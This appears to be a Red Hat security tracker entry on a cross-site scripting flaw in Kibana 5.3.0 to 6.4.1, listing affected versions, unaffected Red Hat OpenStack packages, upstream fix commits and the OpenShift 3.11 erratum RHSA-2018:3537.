Kibana versions 5.3.0 to 6.4.1 had a cross-site scripting (XSS) vulnerability via the source field formatter that could allow an attacker to obtain sensitive information from or perform destructive actions on behalf of other Kibana users. References: https://www.elastic.co/community/security https://discuss.elastic.co/t/elastic-stack-6-4-1-and-5-6-12-security-update/149035
The version included in Red Hat OpenStack 8 & 9, and released as a technical preview, does not contain the vulnerable code. The functionality is not available in kibana-3.1.2, there was a significant rewrite after this time.
Upstream commits: 6.4: https://github.com/elastic/kibana/commit/45e4791efd405b2691c4008d6c3a050e0e7bbdcc#diff-efac77c548187c0b16fe1e531c8210ae 5.6: https://github.com/elastic/kibana/commit/a07347478b7a3b1661cfb77c149fd15bdeb8921d#diff-3ff6e2858b8906e63dd44b7ac317f199
This issue has been addressed in the following products: Red Hat OpenShift Container Platform 3.11 Via RHSA-2018:3537 https://access.redhat.com/errata/RHSA-2018:3537